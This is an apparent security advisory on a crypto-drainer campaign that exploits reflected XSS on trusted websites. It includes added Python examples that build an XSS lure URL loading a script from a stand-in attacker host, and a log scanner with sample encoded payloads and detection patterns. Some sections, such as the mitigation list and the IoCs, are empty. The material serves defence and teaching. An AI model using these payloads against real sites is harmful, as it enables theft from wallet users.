SEAL is tracking an ongoing drainer campaign against specifically targeted Solana and Tron users by a threat actor identified as Perpetual Drainer, and is working closely with industry partners to protect end users. Perpetual Drainer has been observed exploiting reflected XSS vulnerabilities on legitimate websites in order to convince select victims that the legitimate website itself is requesting a transaction. This not only bypasses many of the traditional mitigations implemented by wallets, but also makes a victim more likely to approve the transaction.
Methodology
Like most drainers, Perpetual Drainer operates through an affiliate model. The developers of Perpetual Drainer are responsible for writing the drainer software and hosting the back office infrastructure, while the affiliates are responsible for deploying the drainer software and hosting the front office (victim-facing) infrastructure. In exchange for the software they deploy, affiliates pay a portion of all stolen proceeds to the developers.
However, what makes Perpetual Drainer unique is how it bypasses security mitigations within wallets. Typically, when a user visits a website hosting a drainer, the wallet receives a request from the malicious origin (for example, airdrop-contonsocoin.com). When a victim visits a website hosting Perpetual Drainer, by contrast, the wallet receives a request from a trusted origin (for example, contoso.org).
This is because Perpetual Drainer redirects victims to a reflected XSS exploit on a trusted origin, which then dynamically loads a script from Perpetual Drainer infrastructure that contains the actual drainer logic. Because that script executes in the context of the trusted origin, it can rewrite the DOM to display a wallet connection prompt, and every request it makes to the wallet extension originates from the trusted origin rather than from the malicious origin. Any wallet mitigation keyed on the requesting origin, such as the origin shown in the approval prompt or a blocklist of known malicious domains, therefore sees the trusted site.
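The reflection step above, as an added illustration that is not code from the advisory or from SEAL: a page that reflects a query parameter unescaped lets a crafted link inject an external `<script>` tag that the browser then fetches and runs in the trusted origin, while the same page with HTML escaping renders the payload as inert text. The attacker host `drainer-loader.example`, the `/search?q=` endpoint and the page template are all hypothetical.

```python
import html
from urllib.parse import quote

# Hypothetical attacker-controlled host; not an indicator from the advisory.
ATTACKER_HOST = "drainer-loader.example"


def render_search_vulnerable(query: str) -> str:
    """Reflects the raw query parameter into the page: a reflected XSS sink."""
    return f"<html><body><h1>Results for: {query}</h1></body></html>"


def render_search_hardened(query: str) -> str:
    """Same page with the reflected value HTML-escaped; the browser sees text, not markup."""
    safe = html.escape(query, quote=True)
    return f"<html><body><h1>Results for: {safe}</h1></body></html>"


def drainer_payload() -> str:
    """Closes the surrounding tag and injects a script tag pointing at attacker infrastructure."""
    return f'</h1><script src="https://{ATTACKER_HOST}/loader.js"></script><h1>'


def build_lure_url(trusted_origin: str) -> str:
    """The link a victim is redirected to: the payload rides in the query string of the trusted site."""
    return f"{trusted_origin}/search?q={quote(drainer_payload(), safe='')}"


def contains_external_script(page: str) -> bool:
    """True if the rendered page would make the browser load a remote script."""
    return '<script src="https://' in page


if __name__ == "__main__":
    print(build_lure_url("https://contoso.org"))
    print(contains_external_script(render_search_vulnerable(drainer_payload())))  # True
    print(contains_external_script(render_search_hardened(drainer_payload())))    # False
```

Output encoding at the sink is the fix; a Content-Security-Policy that restricts `script-src` to known hosts is a useful second layer, since it would block the dynamically loaded script even if a reflection is missed.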
Mitigation
SEAL is working with industry partners to identify, notify, and display temporary warnings on sites being exploited by Perpetual Drainer. However, we recommend that developers follow best practices to mitigate XSS attacks, including:
We also recommend that developers review their access logs for the following Indicators of Compromise (IoCs). Because the exploit is reflected, the injected script, or the reference to the externally hosted script, will typically be visible in the request path or query parameters. Note that the payload is usually URL-encoded, sometimes more than once, so decode the request before matching.
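A log review of the kind recommended above, as an added example that is not part of the advisory: the scanner below parses combined-format access log lines, URL-decodes the request target until it stops changing (catching double encoding), flags requests whose decoded path or query contain script-injection markers, and extracts any remote hosts referenced so they can be compared against IoCs. The log lines and the `drainer-loader.example` host are constructed for the example and are not indicators from SEAL.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access log (combined log format). Hosts are placeholders, not real IoCs.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2025:12:00:00 +0000] "GET /search?q=wallet HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [01/Jan/2025:12:00:05 +0000] "GET /search?q=%3Cscript%20src%3D%22https%3A%2F%2Fdrainer-loader.example%2Fl.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.12 - - [01/Jan/2025:12:00:09 +0000] "GET /search?q=%253Cimg%2520src%253Dx%2520onerror%253D%2522import('https://drainer-loader.example/l.js')%2522%253E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.13 - - [01/Jan/2025:12:00:12 +0000] "GET /about HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Markers of script injection in a reflected value; extend with site-specific patterns.
SCRIPT_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),       # inline or external <script> tag
    re.compile(r"\bon[a-z]+\s*=", re.I),     # inline event handler such as onerror=
    re.compile(r"\bimport\s*\(", re.I),      # dynamic import() of a remote module
    re.compile(r"javascript\s*:", re.I),     # javascript: URL
]
REMOTE_SRC_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly until the value stops changing; double encoding is a common evasion."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text: str) -> list[dict]:
    """Return one record per suspicious request: line number, client, decoded target, patterns, hosts."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        decoded = fully_decode(parts.path + "?" + parts.query)
        matched = [p.pattern for p in SCRIPT_PATTERNS if p.search(decoded)]
        if matched:
            hits.append({
                "line": lineno,
                "client": line.split()[0],
                "decoded": decoded,
                "patterns": matched,
                "remote_hosts": sorted(set(REMOTE_SRC_RE.findall(decoded))),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], hit["client"], hit["remote_hosts"], hit["decoded"])
```

Run it over the real access log instead of `SAMPLE_LOG`; the `remote_hosts` field is what to compare against the IoC list, since the same reflection endpoint may be reused with a different loader host.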
IoCs
Contact
If you are a security researcher interested in additional technical information or relevant samples, please complete this form.